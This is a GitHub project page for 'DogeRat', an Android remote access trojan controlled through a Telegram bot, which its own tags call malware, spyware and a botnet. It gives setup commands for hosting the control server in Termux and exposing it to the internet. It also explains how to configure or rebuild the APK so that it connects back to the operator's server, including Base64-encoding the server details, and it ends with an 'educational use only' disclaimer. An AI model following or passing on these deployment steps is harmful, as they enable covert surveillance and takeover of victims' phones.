Did-Dog / DogeRat

A multifunctional Telegram based Android RAT without port forwarding.
MIT License
44 stars 56 forks source link
android-botnet android-exploitation android-java android-java-bot android-malware android-pentesting android-rat android-spyware android-telegram-bot android-telegram-rat telegram-rat termux-hacking termux-hacking-tool

DogeRat

DISCLAIMER⚠️


Logo

A multifunctional Telegram based Android RAT without port forwarding

Panel Screenshot

Logo

Features

Download

Download Termux Download APK Editor

How to host server in Termux

Run the following commands in Termux:

  pkg update && upgrade -y
  pkg install git -y
  git clone https://github.com/did-dog/DogeRat 
  cd DogeRat
  bash start.sh
Enter your bot token 
Enter your chatid 
And hit enter
Now open a new Tab, and give these commands
pkg install openssh
bash port.sh 
Enter your telegram username And hit enter 
Copy url and minimize the termux

Edit apk

example

  { 
  "host": "https://yoururl.com/", 
  "socket": "wss://yoururl.com/", 
  "webView": "https://google.com/" 
}

How to Build in Android Studio

To build the application in Android Studio, follow these steps:

  1. Open the Android Studio and import the application source code.

  2. Navigate to the following path in the source code: Utils/AppTools.java.

  3. In the AppTools.java file, locate the data variable and copy your server information into it.

  4. However, before copying the server information directly into the variable, you must encode it using Base64.

  5. Here is an example JSON structure for your server information:

    {
    "host" : "",
    "socket" : "",
    "webView" : "https://www.google.com"
    }
  6. Fill in the above JSON structure with your server information.

  7. Go to https://www.base64encode.org/ and copy the encoded result of your JSON data.

  8. In Android Studio, paste the encoded result into the data variable.

  9. The final code should look like this:

public static AppData getAppData() {
  String data = "<your encoded server info>";
  String text = decode(data);
  return new Gson().fromJson(text, AppData.class);
}

Important Disclaimer

Note: The developer provides no warranty with this software and will not be responsible for any direct or indirect damage caused by the usage of this tool. Dogerat is built for educational and internal use only.

Attention: We do not endorse any illegal or unethical use of this tool. The user assumes all responsibility for the use of this software.

Important: To prevent any fraudulent activity, please ensure that the Instagram username is @DIDDOG and the Telegram handle is @CYBERSHIELDX. Beware of scams and phishing attempts that use similar usernames or handles.

Thank you for using Dogerat - we hope it serves its intended purpose and helps you achieve your goals!

Sponsorship

If you find my work valuable, you can show your support by sponsoring me. Your contribution will help me maintain and improve my projects, and it will encourage me to create more useful content.

Buy me a coffee

Thank you to the following people for their support:

Stargazers Forkers

Technology Stack Used

Javascript Shell Java Shell


πŸ”— Help / Contact and Social Media Accounts

Telegram Badge Instagram Badge Facebook Badge Twitter Badge Youtube Badge


-------------------------